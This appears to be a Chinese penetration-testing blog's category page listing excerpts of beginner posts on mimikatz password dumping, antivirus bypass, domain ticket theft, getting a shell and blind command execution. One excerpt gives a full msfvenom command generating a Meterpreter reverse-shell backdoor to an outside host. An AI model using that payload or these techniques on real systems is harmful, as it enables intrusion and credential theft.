分类：初级安全 - 一个博客

分类
初级安全

Windows获取明文密码的常见方式

初级安全

Windows获取明文密码目前网络上已经有许多获取Windows系统明文密码的方式了，且都比较成熟，所以我这里写的和那些相比就属于小巫见大巫了。这里主要将抓取明文密码，抓Hash方法也适用，但是包含但不限于下述这些方法。直接使用mimikatz 第一种比较常见的就是直接使用mimikatz抓取

关于执行命令时被拦截的那档子事

初级安全

关于执行命令时被拦截的那档子事因为电脑就安装了火绒，所以就用火绒实验了，360之类的应该同理。绕过拦截虽然这个思路我早就有，但是一直没实验；今天恰巧下载文件太慢我试试用certutil命令下载，然后执行命令的时候被火绒弹窗拦截了。

PowerShell一些笔记

初级安全

Powershell使用 msf生成后门： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test

Windows一些笔记

初级安全

Windows笔记本基本命令使用 bat脚本替换文件内容：挖草，记得啥东西也记不得了。 for /f %i in (1.txt) do (set STR=%i & set RESULT=%STR:\=-% & set RESULT=%STR::=oo% echo %RESULT%) bat中按行

Windows域内一些笔记

初级安全

域内窃取票据有时候环境比较恶劣，目标机器无法上线，所以无法直接使用cs来窃取进程的token信息。条件允许的情况下，上传mimikatz，至于免杀就只有自行想其他办法，然后选个合适的时间登录远程桌面进行操作。原文链接：https://paper.seebug.org/1669 直接上手操作，原理

记一次稀里糊涂getshell的测试

初级安全

前言记录一次授权的测试，这个目标是真的太难了太难了太难了，网上能查找到的信息很少，最多只能找到一些学号，职工号以及身份证来来回回找了将近一个月都没找到，心力憔悴。学校所有的域名都解析到了同一个IP地址，并且这个IP上有很强很强的防护措施(*甚至连一个单引号就直接连接重置,过分*)，前期一点进展也没

关于命令执行无回显的那档子事

初级安全

关于命令执行无回显的那档子事有时候千辛万苦的拿到一个RCE的入口点或突破点，但是那个RCE点位却无法回显，导致我们执行的任何命令都看不到结果，这样非常影响我们的下一步操作。获得回显目前获得回显的主要方式是通过dnslog，但是个人感觉dnslog有些不完美，不可控（只是我不咋会用的原因），这样